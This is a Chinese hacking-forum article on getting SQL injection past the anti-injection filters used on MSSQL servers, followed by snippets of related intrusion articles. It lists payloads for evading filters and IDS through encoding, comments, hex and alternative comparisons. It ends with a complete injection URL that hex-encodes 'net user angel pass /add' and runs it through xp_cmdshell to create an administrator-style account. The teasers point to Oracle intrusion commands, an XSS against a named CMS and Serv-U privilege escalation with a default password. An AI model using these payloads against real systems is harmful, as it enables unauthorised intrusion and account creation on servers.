渗透服务器 绕过防注入文件                
                
                    所属分类:
                        网络安全 / 黑客入侵                    
                    阅读数:
                        158
                    
                        收藏 0赞 0分享
                    
                 
                
                    一般通用过滤字符串的关键字有以下这些: 
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = 
而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。 
对于关键字的过滤,以下是我收集的以及我个人的一些想法。 
1、运用编码技术绕过 
如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 
2、通过空格绕过 
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or' swords' =‘swords' ,由于mssql的松散性,我们可以把or 'swords' 之间的空格去掉,并不影响运行。 
3、运用字符串判断代替 
用经典的or 1=1判断绕过,如or 'swords' ='swords',这个方法就是网上在讨论的。 
4、通过类型转换修饰符N绕过 
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or 'swords' = N' swords' ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。 
5、通过+号拆解字符串绕过 
效果值得考证,但毕竟是一种方法。如 or 'swords' =‘sw' +' ords' ;EXEC(‘IN' +' SERT INTO '+' …..' ) 
6、通过LIKE绕过 
以前怎么就没想到呢?如or 'swords' LIKE 'sw'!!!显然可以很轻松的绕过“=”“>”的限制…… 
7、通过IN绕过 
与上面的LIKE的思路差不多,如or 'swords' IN ('swords') 
8、通过BETWEEN绕过 
如or 'swords' BETWEEN 'rw' AND 'tw' 
9、通过>或者<绕过 
or 'swords' > 'sw' 
or 'swords' < 'tw' 
or 1<3 
…… 
10、运用注释语句绕过 
用/**/代替空格,如:UNION /**/ Select /**/user,pwd,from tbluser 
用/**/分割敏感词,如:U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser 
11、用HEX绕过,一般的IDS都无法检测出来 
0x730079007300610064006D0069006E00 =hex(sysadmin) 
0x640062005F006F0077006E0065007200 =hex(db_owner) 
另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下: 
  declare @a sysname 
  select @a= 
  exec master.dbo.xp_cmdshell @a 
效果: 
http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% 20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;-- 
其中的 0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 就是“net user angel pass /add”的意思。 
这个是突破单个如NoSqlHack这类文件的。但我认为最重要的是要考虑服务器的安全,配置安全,有健全的防火墙和杀毒软件。就这样吧。也很久没更新BOLG了。                                    
             
            
                
                对有防火墙主机的入侵渗透
一、踩点
ping 
[url=http://www.xxx.com]www.xxx.com[/url]
 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。
二、注入
从源文件里搜索关键字asp,
                    
                    收藏 0赞 0分享
浅谈入侵UNIX
一:基本知识 
1:常见UNIX版本: 
SCO UNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD, 386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN)
                    
                    收藏 0赞 0分享
全方位了解黑客如何入侵NT系统
现在的企业当中一般都是使用的NT系统,也不得不承认,NT系统的确是非常适合企业使用的操作系统,然而“黑客”的攻击引来了企业信息安全危机…… 
得到了NT的管理员密码还能做什么,还不是想做什么就做什么呗。但到底能做什么呢?能详
                    
                    收藏 0赞 0分享
入侵Oracle数据库时常用的操作命令整理
本文按步骤讲解如何入侵Oracle数据库时常用的操作命令整理。 
1、su–Oracle不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。 
2、sqlplus /nolog 或sqlplus system/manager 或./sq
                    
                    收藏 0赞 0分享
通杀动易2005的 XSS 攻击
动易2005里面,留言的时候存在一个XSS。
攻击方法如下 :
首先在网站注册一个普通会员,然后去GUESTBOOK留言,在插入图片的时候地址写上(建议在原代码里面把图片的高度与宽度都设置成0,这样在图片前面加上这个连接,基本上就看不见图片了,图片的连接却被管理员解吸
                    
                    收藏 0赞 0分享
Serv-u6.0提权新招
适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator   密码:#|@$ak#.|k;0@p      下面用MSWins
                    
                    收藏 0赞 0分享
DNS(域名服务器)欺骗技术
概述:什么是DNS欺骗?
DNS欺骗是一门改变DNS原始指向IP的艺术。为了更好的理解,让我们先来看一个例子。如果你想用浏览器去google搜索一些信息,毫无疑问的你会在地址栏里输入www.google.com的网址然后回车。
那么在这背后又有什么事情正在进行着呢?一般而
                    
                    收藏 0赞 0分享
用“电驴”抓肉鸡
我用“电驴”抓肉鸡!!难道是放一个“电驴”在路上,等“火鸡”过来,一不小心踩在“电驴”上结果给烫熟了,结果就成“肉鸡”了。很多朋友说抓肉鸡很难,找好肉鸡就更难,
                    
                    收藏 0赞 0分享
轻松学会入侵网络服务器
尽管为服务器设计软件的软件工程师们想方设法提高系统的安全性,然而由于系统管理员的水平参差不齐或安全意识底下,往往给黑客提供了入侵的机会。 
  其实每一个黑客都有自己独到的方法。笔者对于入侵网站服务器的资料收集了很多,但是因为实际情况的不同,往往
                    
                    收藏 0赞 0分享
139/445端口与入侵win 2000主机
SMB(Server Message Block),Windows协议族,用于文件和打印共享服务。在Win9X/NT中SMB基于NBT实现,NBT(NetBIOS over TCP/IP)使用137, 138 (UDP) and 139 (TCP)来实现基于TCP/IP的NETB
                    
                    收藏 0赞 0分享
                 查看更多